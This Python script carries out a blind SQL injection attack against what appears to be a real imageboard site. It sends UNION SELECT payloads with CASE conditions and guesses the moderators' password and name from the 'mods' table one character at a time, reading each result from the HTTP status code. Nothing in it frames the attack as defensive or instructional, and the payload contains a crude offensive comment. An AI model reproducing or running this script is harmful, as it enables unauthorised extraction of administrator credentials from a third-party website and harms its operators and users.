import requests
import urllib.parse
import sys
targetlen = 20
sofar = ''
field = 'password'
targetlen = 5
sofar = ''
field = 'name'
siteprefix = '
http://irc.4taba.net/board/';
template = "' UNION SELECT * FROM threads LIMIT (CASE WHEN ((SELECT COUNT(*) FROM mods WHERE substr({{{FIELD}}}, {{{INDEX}}} + 1, 1) = char({{{GUESS}}})) = 0) THEN 1 ELSE -1 END) -- rape"
guesses = str.join('', [chr(c) for c in range(32, 127)])
def attemptSlotChar(guess):
url = template
url = url.replace('{{{FIELD}}}', field)
url = url.replace('{{{INDEX}}}', str(len(sofar)))
url = url.replace('{{{GUESS}}}', str(ord(guess)))
url = siteprefix + urllib.parse.quote(url, safe='')
r = requests.get(url)
if r.status_code == 500:
print(f' GOOD: {sofar}{guess}')
return True
elif r.status_code == 200:
print(f'FAILED: {sofar}{guess}')
return False
else:
print(f' %3d: {sofar}{guess}' % (r.status_code))
return False
while len(sofar) != targetlen:
for guess in guesses:
if not attemptSlotChar(guess): continue
sofar += guess
break
print('=========================================')
print()
print(f'FINAL RESULT: {sofar}')
print()
print('=========================================')